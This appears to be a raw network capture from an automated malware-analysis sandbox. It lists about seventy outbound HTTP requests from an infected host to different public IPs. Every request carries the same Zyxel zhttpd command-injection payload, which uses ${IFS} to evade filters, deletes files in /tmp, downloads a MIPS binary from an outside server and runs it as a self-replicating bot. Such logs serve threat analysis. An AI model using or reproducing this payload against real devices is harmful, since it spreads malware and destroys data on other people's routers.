                        1509192.168.2.145832288.30.195.240443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.093575954 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1510192.168.2.1448450126.236.201.123443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.093616009 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1511192.168.2.1459766206.2.91.80443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.093647957 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1512192.168.2.144024842.129.160.119443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.093662024 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1513192.168.2.1446372200.126.213.203443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.093708038 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1514192.168.2.1438974112.40.193.211443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.093750000 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1515192.168.2.145978490.140.27.114443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.093805075 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1516192.168.2.143398070.146.6.210443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.093859911 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1517192.168.2.1452812206.193.192.170443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.093903065 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1518192.168.2.1439814198.252.83.10443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.093945026 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1519192.168.2.1432816193.194.244.68443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.093966007 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1520192.168.2.1445678207.129.21.191443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.094022989 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1521192.168.2.1438984137.85.186.41443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.094060898 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1522192.168.2.1449152206.240.62.112443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.094115973 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1523192.168.2.1432918115.169.86.147443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.094171047 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1524192.168.2.1459496183.125.243.36443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.094222069 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1525192.168.2.1444406161.47.90.183443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.094244003 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1526192.168.2.145359060.104.77.54443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.094312906 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1527192.168.2.1451918223.200.10.233443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.094347954 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1528192.168.2.143591878.136.254.72443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.094415903 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1529192.168.2.145097886.67.170.87443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.094455957 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1530192.168.2.1450160223.228.187.134443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.094490051 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1531192.168.2.1437302122.21.20.3443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.094548941 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1532192.168.2.143934678.124.29.39443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.094578028 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1533192.168.2.1434338119.24.28.136443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.094624996 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1534192.168.2.144271643.240.192.221443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.094666004 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1535192.168.2.144224086.244.47.60443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.094707966 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1536192.168.2.1443202138.103.155.188443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.094753981 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1537192.168.2.145041232.4.51.82443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.094784021 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1538192.168.2.1434406190.130.204.254443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.094808102 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1539192.168.2.144083898.129.179.1443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.094866037 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1540192.168.2.143801054.228.46.11443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.094913006 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1541192.168.2.143937242.67.228.1443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.094958067 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1542192.168.2.1452464109.85.41.103443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.094997883 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1543192.168.2.143873213.36.207.108443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.095032930 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1544192.168.2.1452376151.211.107.211443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.095079899 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1545192.168.2.143552639.243.82.164443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.095123053 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1546192.168.2.1443970160.216.31.119443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.095187902 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1547192.168.2.144007272.19.83.97443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.095235109 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1548192.168.2.145462868.73.194.161443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.095268965 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1549192.168.2.145625649.243.222.240443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.095334053 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1550192.168.2.1455726173.164.49.62443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.095370054 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1551192.168.2.146084860.41.159.82443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.095396996 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1552192.168.2.1436878189.47.101.168443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.095457077 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1553192.168.2.144610884.10.238.165443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.095484018 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1554192.168.2.1456496217.232.91.200443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.095534086 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1555192.168.2.143784027.36.56.75443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.095592022 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1556192.168.2.1455454162.10.252.213443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.095621109 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1557192.168.2.1448916187.33.22.133443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.095676899 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1558192.168.2.1460634155.177.55.198443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.095725060 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1559192.168.2.144436058.194.242.227443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.095746994 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1560192.168.2.1451720150.47.61.248443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.095787048 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1561192.168.2.144300081.230.224.58443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.095843077 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1562192.168.2.1447680155.221.139.129443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.095887899 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1563192.168.2.1460300146.200.233.117443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.095962048 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1564192.168.2.143761292.207.64.71443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.095987082 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1565192.168.2.145730447.161.35.227443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.096052885 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1566192.168.2.145318046.96.69.196443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.096095085 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1567192.168.2.144956057.22.250.197443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.096132994 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1568192.168.2.144248640.252.27.81443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.096158028 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1569192.168.2.14490228.237.209.173443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.096177101 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1570192.168.2.1445944199.109.240.109443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.096214056 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1571192.168.2.144485423.6.239.216443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.096239090 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1572192.168.2.145739432.36.205.34443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.096293926 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1573192.168.2.143388265.20.16.195443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.096344948 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1574192.168.2.145161074.78.40.45443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.096389055 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1575192.168.2.1445184212.17.98.118443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.096416950 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1576192.168.2.1451930189.185.135.88443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.096456051 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1577192.168.2.1459686138.211.164.150443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.096489906 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1578192.168.2.1441242124.252.207.162443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.096529007 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


